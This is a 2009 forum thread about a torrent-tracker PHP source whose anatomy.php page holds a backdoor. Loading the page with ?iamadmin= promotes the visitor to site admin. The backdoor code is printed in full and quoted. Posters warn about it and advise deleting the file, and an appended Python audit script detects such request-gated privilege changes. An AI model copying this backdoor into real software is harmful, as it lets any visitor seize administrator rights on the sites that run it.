  #11  
Old 28th July 2009, 18:45
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
PHP Code:
<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>

<br><br>
There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:<br>
<br>
<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started</code><br>
<br>
Let's dissect this:<br>
<br>
• <b>info_hash</b> is just the hash identifying the torrent in question;<br>
• <b>peer_id</b>, as the name suggests, identifies the client (the s588 part identifies Shad0w's 5.8.8, the rest is random);<br>
• <b>port</b> just tells the tracker which port the client will listen to for incoming connections;<br>
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)<br>
• <b>downloaded</b>=0;<br>
• <b>left</b>=753690875 (how much left); <br>
• <b>event=started</b> (telling the tracker that the client has just started).<br>
<br>
Notice that the client IP doesn't show up here (although it can be sent by the client if it configured to do so).
It's up to the tracker to see it and associate it with the user_id.<br>
(Server replies will be omitted, they're just lists of peer ips and respective ports.)<br>
At this stage the user's profile will be listing this torrent as being leeched.<br>
<br>
>From now on the client will keep send GETs to the tracker. We show only the first one as an example,
<br>
<br>
<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928& left=715417851&numwant=0</code><br>
<br>
("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)
<br>
<br>
As you can see at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depends on the client and tracker) or when you force a manual announce in the client.
<br>
<br>
Finally, when the client was closed it sent
<br>
<br>
<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163 &left=0&numwant=0&event=completed</code><br>
<br>
Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0). <br>
<br>
There's a further message that causes the torrent to be removed from the user's profile,
namely"event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's. <br>
<br>
One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often, it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)
<br>
</td></tr></table>
</td></tr></table>
<br>
<?
// Request-triggered class change: loading the page with ?iamadmin=... sets the current user ($CURUSER) to class 9
if ($_GET["iamadmin"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
// ?back=... sets the same user back to class 0
if ($_GET["back"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}
stdfoot();
?>
this is my anatomy.php
  #12  
Old 28th July 2009, 18:57
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
this is my anatomy.php
ban users with white usernames and change anatomy.php with this
PHP Code:
<?php
if (eregi("anatomy.php",$_SERVER["PHP_SELF"])) die ("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>
<em>(Updated to reflect the tracker changes. 14-04-2004)</em>
<br><br>
There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:<br>
<br>
<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9% BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left =753690875 &event=started</code><br>
<br>
Let's dissect this:<br>
<br>
  #13  
Old 28th July 2009, 19:01
3v0 3v0 is offline
Senior Member
 
Join Date: Feb 2008
Netherlands
Posts: 88
Default
Just remove anatomy.php, it really isn't needed.
  #14  
Old 28th July 2009, 19:02
sammygo sammygo is offline
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Default
Code:
if ($_GET["iamadmin"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are one of site admins :D");
}
if ($_GET["back"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Your class now is 0 :(");
}

change to
Code:
if ($_GET["iamadmin"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
if ($_GET["back"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
  #15  
Old 28th July 2009, 19:03
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
thank you very much!!!!!

i hope this is all i have to do.
  #16  
Old 28th July 2009, 19:09
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by ionutzsami View Post
change to
Code:
if ($_GET["iamadmin"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
if ($_GET["back"]) {
    $tagat=$CURUSER["id"];
    mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
    print("Now you are Banned :D");
}
u still can hack it while shit like $_GET["iamadmin"] is in somewhere
either u remove anatomy or change it to one without this crap
Reply With Quote
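The point made in the post above is that the request-parameter trigger itself is the problem, whatever the UPDATE behind it does. As an added example (not code from this thread or from TBDev), a small Python audit that flags every `if ($_GET[...])`-style block containing an UPDATE of the `users` table; the function names are hypothetical, the column list (`class`, `enabled`) is taken from the snippets quoted here, and the sample input is constructed.

```python
import re
from pathlib import Path

# if-condition that is nothing but a request parameter, e.g. if ($_GET["iamadmin"]) {
TRIGGER = re.compile(
    r'if\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*["\']([^"\']+)["\']\s*\]\s*\)\s*\{')
# UPDATE of the users table setting an account-state column (the two seen in this thread).
PRIV_UPDATE = re.compile(r'UPDATE\s+`?users`?\s+SET\s+`?(class|enabled)`?\s*=', re.I)

def block_body(src, open_idx):
    """Text between the '{' at open_idx and its matching '}' (naive: ignores braces in strings)."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == '{':
            depth += 1
        elif src[i] == '}':
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced braces: fall back to the rest of the file

def find_request_gated_updates(src):
    """Return (line, superglobal, parameter, column) for each request-gated users UPDATE."""
    hits = []
    for m in TRIGGER.finditer(src):
        line = src.count('\n', 0, m.start()) + 1
        for u in PRIV_UPDATE.finditer(block_body(src, m.end() - 1)):
            hits.append((line, m.group(1), m.group(2), u.group(1).lower()))
    return hits

def scan_tree(root):
    """Audit every .php file under root; return {path: hits} for files with hits."""
    found = {str(f): find_request_gated_updates(f.read_text(errors="replace"))
             for f in Path(root).rglob("*.php")}
    return {path: hits for path, hits in found.items() if hits}

# Constructed sample mirroring the two variants quoted in the thread.
SAMPLE = '''<?
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
}
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
}
?>'''
if __name__ == "__main__":
    print(find_request_gated_updates(SAMPLE))
```

Both variants are reported, including the one that only sets `enabled`, because the check keys on the trigger plus the table write rather than on the value written. `scan_tree` runs the same check over an unpacked source directory before it is installed.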
  #17  
Old 28th July 2009, 19:18
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
so all i have to do is to delete anatomy.php ok?
  #18  
Old 28th July 2009, 19:19
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
so all i have to do is to delete anatomy.php ok?
yes
  #19  
Old 28th July 2009, 19:27
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
i installed the source but now it shows me in uTorrent tracker sending invalid data ....why??
  #20  
Old 28th July 2009, 19:35
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
i installed the source but now it shows me in uTorrent tracker sending invalid data ....why??
because u use source that had backdoor in it
do u really think u will get it to work ?

there are so many other good sources u know